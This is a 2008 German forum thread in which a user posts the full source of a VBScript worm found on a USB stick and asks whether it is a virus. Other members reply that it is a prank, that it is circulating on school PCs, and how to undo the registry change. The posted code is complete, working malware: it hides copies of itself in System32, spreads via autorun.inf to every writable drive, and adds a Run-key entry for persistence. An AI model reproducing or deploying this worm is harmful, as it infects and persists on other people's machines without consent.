IE: "Hacked bye...." Was'n das?? Ein Virus?
Übersicht
Sonstiges Smalltalk
|
WaveblueBetreff: IE: "Hacked bye...." Was'n das?? Ein Virus? |
 Mo, Jun 09, 2008 14:05Antworten mit Zitat 
|
|---|---|---|
|
Eines Morgens fand ich mein Internet-Explorer so vor:
Im Fenstertitel stand immer "(website) - Hacked by FELIX-PC" Nun hab ich geguckt und ein Script auf meinem Usb-Stick gefunden Oo Inklusive Autorun-Datei die es aufruft. Das stand drinn: (FELIX-PC ist mein Computer) Code: [AUSKLAPPEN] 'Mutation of Trojan virus.
'My name is FELIX-PC.vbs On error resume next Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname Set fs = createobject("Scripting.FileSystemObject") Set wn = WScript.CreateObject("WScript.Network") Set mf = fs.getfile(Wscript.ScriptFullname) oldname=CStr(fs.getfilename(Wscript.ScriptFullname)) newname = wn.ComputerName & ".vbs" rgname = Replace(newname,".vbs","") atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FELIX-PC.vbs" dim text,size size = mf.size check = mf.drive.drivetype Set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf Loop mysource=Replace(mysource,oldname,newname) do Set winpath = fs.getspecialfolder(0) Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 32 Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true) tf.write mysource tf.close Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 39 For each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then Set tf=fs.getfile(flashdrive.path &"\FELIX-PC.vbs") tf.attributes =32 Set tf=fs.createtextfile(flashdrive.path &"\FELIX-PC.vbs",2,true) tf.write mysource tf.close Set tf=fs.getfile(flashdrive.path &"\FELIX-PC.vbs") tf.attributes =39 Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 End If next Set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","") if check <> 1 then Wscript.sleep 120000 End if loop while check<>1 Set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname AntiVir sagt nix dazu, kann mir jemand Auskunft geben ob das ein echter Virus ist? (Kenn mich damit nicht aus) |
||
|
This is 10% luck
20% skill 15% concentrated power of will 5% pleasure, 50% pain and 100% reason to remember the name |
||
- Zuletzt bearbeitet von Waveblue am Di, Jun 10, 2008 22:16, insgesamt einmal bearbeitet
|
Thorsten |
Mo, Jun 09, 2008 14:24 Antworten mit Zitat
|
|---|---|---|
|
Das "- Windows Internet Explorer" wurde durch "- hacked by XX" ersetzt; durch einen Zugriff auf die Registry im Eintrag "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title".
Scheint nur ein kleiner Streich zu sein. mfG, Thorsten |
||
|
Smily |
Mo, Jun 09, 2008 14:35 Antworten mit Zitat
|
|---|---|---|
| Wobei ich mir trotzdem gedanken machen würde, wenn scripte so leichtfertig auf dem eigenen PC ausgeführt werden können. Und dann auch noch mit vollen rechten (-> Registry bearbeiten) | ||
|
Lesestoff:
gegen Softwarepatente | Netzzensur | brain.exe | Unabhängigkeitserklärung des Internets "Wir müssen die Rechte der Andersdenkenden selbst dann beachten, wenn sie Idioten oder schädlich sind. Wir müssen aufpassen. Wachsamkeit ist der Preis der Freiheit --- Keine Zensur!" stummi.org |
||
Coffee |
Mo, Jun 09, 2008 14:41 Antworten mit Zitat
|
|
|---|---|---|
|
jo das script kursiert auch bei uns auf den schulrechnern (wird wohl grade entfernt, freitag entdeckt)
lg |
||
| *Mjam* | ||
|
|
Waveblue |
Mo, Jun 09, 2008 22:35 Antworten mit Zitat
|
|---|---|---|
|
Da bin ich ja beruhigt ^^°
Vielen Dank für die Hilfe. Eine Frage hätt ich aber noch.....wie krieg ich das wieder normal? O.o |
||
|
This is 10% luck
20% skill 15% concentrated power of will 5% pleasure, 50% pain and 100% reason to remember the name |
||
|
|
Thorsten |
Mo, Jun 09, 2008 23:00 Antworten mit Zitat
|
|---|---|---|
|
IE auf + Screenshot machen
mfG, Thorsten |
||
|
|
Waveblue |
Mo, Jun 09, 2008 23:47 Antworten mit Zitat
|
|---|---|---|
| https://www.blitzforum.de/upload/file.php?id=3049 | ||
|
This is 10% luck
20% skill 15% concentrated power of will 5% pleasure, 50% pain and 100% reason to remember the name |
||
|
D2006Administrator |
Di, Jun 10, 2008 8:53 Antworten mit Zitat
|
|---|---|---|
| Im Script steht doch drin, welcher Registry-Key verändert wurde. Einfach die Veränderung rückgängig machen. per Ausführen -> "regedit". | ||
|
Intel Core i5 2500 | 16 GB DDR3 RAM dualchannel | ATI Radeon HD6870 (1024 MB RAM) | Windows 7 Home Premium
Intel Core 2 Duo 2.4 GHz | 2 GB DDR3 RAM dualchannel | Nvidia GeForce 9400M (256 MB shared RAM) | Mac OS X Snow Leopard Intel Pentium Dual-Core 2.4 GHz | 3 GB DDR2 RAM dualchannel | ATI Radeon HD3850 (1024 MB RAM) | Windows 7 Home Premium Chaos Interactive :: GoBang :: BB-Poker :: ChaosBreaker :: Hexagon :: ChaosRacer 2 |
||
|
|
Thorsten |
Di, Jun 10, 2008 13:40 Antworten mit Zitat
|
|---|---|---|
mfG, Thorsten |
||
|
|
Waveblue |
Di, Jun 10, 2008 18:03 Antworten mit Zitat
|
|---|---|---|
|
ok, vielen Dank^^
Mfg Wave |
||
|
This is 10% luck
20% skill 15% concentrated power of will 5% pleasure, 50% pain and 100% reason to remember the name |
||
Übersicht
Sonstiges Smalltalk
Powered by phpBB © 2001 - 2006, phpBB Group